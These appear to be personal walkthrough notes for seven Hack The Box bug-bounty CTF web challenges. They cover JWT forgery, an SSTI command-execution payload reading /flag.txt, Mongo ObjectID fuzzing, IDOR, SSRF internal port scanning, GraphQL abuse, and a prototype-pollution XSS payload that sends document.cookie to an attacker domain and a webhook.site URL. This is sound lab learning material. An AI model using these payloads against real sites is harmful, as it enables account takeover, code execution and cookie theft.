Table of Contents¶

Criticalops/HTB
NovaEnergy/HTB
JinjaCare/HTB
Neovault/HTB
CitiSmart/HTB
SpeedNet/HTB
Sattrack/HTB

Hack The System - Bug Bounty CTF Playground¶

Criticalops¶

Criticalops is a web application designed to monitor several critical infrastructure of XYZ region. Users usualy use this website to report for unusual behavioral, or we also called it ticket. They've asked you to hunt for any potential security issues in their application and retrieve the flag stored in their site.

📝 Related Bug Bounty Reports
Bug Report #1 - JWT client-side

decoce jwt tocken and:
change to admin?
use one of id's from /api/controls
should I find Sign JWT: Secret -> yes, I just should have used the search in devtools.
craft JWT token with admin:admin

NovaEnergy¶

NovaEnergy is a internal web application used for file sharing system. This site can only be accessed by employee of NovaEnergy company. You're tasked to hunt for any vulnerabilities that led to any breaches in their site.

📝 Related Bug Bounty Reports
Bug Report #1 - Bypass Email verification
Bug Report #2 - Bypass Email verification in Mozilla

Start fuzzing - get /api endpoint

fuzz api endpoints:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/api/api-endpoints.txt:FUZZ -u http://<ip>:<port>/FUZZ -recursion -recursion-depth 3 -ic -t 100

-> get swagger ui

get token from registered /userDetails and /email-verify with it
login

Hack The System - Bug Bounty CTF¶

JinjaCare¶

Jinjacare is a web application designed to help citizens manage and access their COVID-19 vaccination records. The platform allows users to store their vaccination history and generate digital certificates. They've asked you to hunt for any potential security issues in their application and retrieve the flag stored in their site.

📝 Related Bug Bounty Reports
Bug Report #1 - RCE via SSTI
Bug Report #2 - SSTI

registrate account and change name to {{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }}

NeoVault¶

Neovault is a trusted banking application that allows users to effortlessly transfer funds to one another and conveniently download their transaction history. We invite you to explore the application for any potential vulnerabilities and uncover the flag hidden within its depths.
📝 Related Bug Bounty Reports
Bug Report #1 - Mongo Object ID Prediction
Bug Report #2 - IDOR

# fuzz mongoid with list from mongo-objectid-predict
ffuf -w mongo-objectid-predict.txt -X POST \
  -u http://94.237.48.12:52151/api/v2/transactions \
  -H "Content-Type: application/json" \
  -H "Cookie: token=<token>\
  -d '{"toUserId":"FUZZ","amount":1,"description":"1","category":"Entertainment"}' \
  -mr "OK" ?

and you get 685fecb057c495db3d91dde1 [Status: 201, Size: 48, Words: 3, Lines: 1, Duration: 97ms] + from transactions tab username Sent to user_with_flag <- and stuck here
so:
1. Even FindSomething/JS Recon Buddy extensions show /api/v1/ in endpoints and nextjs chunks
2. mongo-objectid-predict additionally have --backward flag for generate more ids (optional)
3. After get user_with_flag start to test API endpoints
4. download-transactions have suspiciously empty body
5. _id is not provided -> intercept download request, change to v1 and add _id in body -> Forward
6. Flag downloaded ( ˶ˆᗜˆ˵ )

CitiSmart¶

Citismart is an innovative Smart City monitoring platform aimed at detecting anomalies in public sector operations. We invite you to explore the application for any potential vulnerabilities and uncover the hidden flag within its depths.

Related Bug Bounty Reports: Bug Report #1 - Expose Hidden Endpoints Bug Report #2 - SSRF

katana find something katana -u http://94.237.54.192:30476/ -jc -silent | tee js_katana.txt
cat js_katana.txt | xargs -I{} python3 LinkFinder/linkfinder.py -i {} -o li | tee endpoints.txt finds api endpoints
Or just use chrome/brave devtools

let n = {
    endpoints: {
        me: "/api/auth/me",
        login: "/api/auth/login",
        logout: "/api/auth/logout",
        dashboard: "/api/dashboard/endpoints",
        dashboardDelete: "/api/dashboard/endpoints/",
        dashboardData: "/api/dashboard/metrics"
    }

intercept response and change to true;
to check for SSRF send request to /api/dashboard/endpoints with interactsh or webhook.site url;
fuzz - internal port scanning | Cross site port attack (XSPA)

ffuf -X POST -u "http://<ip>:<port>/api/dashboard/endpoints/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/local-ports.txt -H "Cookie: token=token" -H "Content-Type: application/json" -d '{"url": "http://FUZZ#","sector": "Port: FUZZ"}' -fw 3

127.0.0.1:80            [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 117ms]
127.0.0.1:3000          [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 105ms]
127.0.0.1:5000          [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 101ms]
127.0.0.1:5984          [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 97ms]
127.0.0.1:5986          [Status: 500, Size: 66, Words: 6, Lines: 1, Duration: 103ms]

after fuzzing check
entry will creates only with # appended to ("reason adding # after port to push state of the application to the client, it just like bookmark the current state of the application." - 2Fa0n)
HackTricks - CouchDB: manually enumerate 127.0.0.1:5984/_all_dbs -> /citismart/_all_docs? and finally http://127.0.0.1:5984/citismart/FLAG# get a flag from /metrics response

SpeedNet¶

Speednet is an Internet Service Provider platform that enables users to purchase internet services. We invite you to participate in our bug bounty program to identify any potential vulnerabilities within the application and retrieve the flag hidden on the site. For your testing, we have provided additional email services. Please find the details below: Email Site: http://IP:PORT/emails/ Email Address: test@email.htb 📝 Related Bug Bounty Reports **Bug Report

1- Graphql BatchingBug Report¶

2** -¶

Graphql Introspection
Bug Report #3 - Alias-based Query Batching
Bug Report #4 - Hacking Graphql Endpoints

register a new user and get a Graphql endpoint
change userId in query GetUserProfile -> admin data

from Graphql Introspection report use query:

{
    "query": "query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"
}

-> mutation object: devForgotPassword and Invoice

replace forgotPassword to devForgotPassword -> reset token
reset password with that token and bruteforce otp bbctf_otpbypass_graphqlbatch.py to get JWT token from VerifyTwoFactor mutation responce
log in created account and change the token in local storage 🗘 Billing - ⚐ ❤︎ (or { "query":"query { invoiceHistory(limit:10) { id number amount status dueDate } }" })

Sattrack¶

Welcome to the Sattrack Bug Bounty Invitational for Authorized Users! Sattrack is a premier platform dedicated to monitoring satellite data, exclusively available to our selected authorized partners. We invite you to participate in our limited bug bounty program, aimed at identifying and addressing any security vulnerabilities within our application. Your contributions are invaluable in helping us maintain the integrity and security of our services. You may use partner@rockyou.xyz:partn3r123 as a valid credentials. To ensure optimal site performance, we have established a dedicated support page at /report. Here, you can submit the URLs of any issues (non-security related) you encounter, and our admin team will promptly investigate and provide assistance.

Related Bug Bounty Reports: Bug Report #1 - Mermaid Prototype Pollution Bug Report #2 - Prototype Pollution Bug Report #3 - JSON Escaping

in login page: JS_FILES: [] is an array which take a path (execute?)
from dashboard:

function shareData(type) {
      const shareUrl = window.location.origin + `/partner/share?type=${type}&data=${encodeURIComponent(JSON.stringify(data))}`;

from login error: GET /login?message=%7B%22text%22:+%22Invalid+email+or+password%22%7D HTTP/1.1
hint from #1st: %%{init: {<JSON_OBJECT>}}%% -> %%{init: { '__proto__': {'polluted': 'asdf'}} }%% and #2nd: https://blog.swiftype.com/#__proto__[asd]=alert(document.domain) reports
Mozilla - Object prototypes
pre-escaped, double-encoded, prototype-pollution-bait payload structure:

{
    "text": "Invalid email or password",
    "_proto_": {
        "JS_FILES": [
            "/partner/share?type=\"};fetch('ATTACKER_Domain/?exploit='+document.cookie)//"
        ]
    }
}

[!cite] ChatGPT "__proto__" -> typical prototype pollution key (trying to set __proto__ on an object) "JS_FILES" -> injecting into a JavaScript array used to load scripts The string contains };fetch('ATTACKER_Domain/?exploit=' + document.cookie)// so the attacker tries to break out of a JavaScript context, close path with "}; and then run fetch(...)

payload: http://127.0.0.1/login?message={"__proto__":{"JS_FILES":["/partner/share?type=%252522};fetch('https://webhook.site/<webhook_token>/'%25252Bdocument.cookie)%253B%252F%252F"]}}
replace token, change path to /admin and good night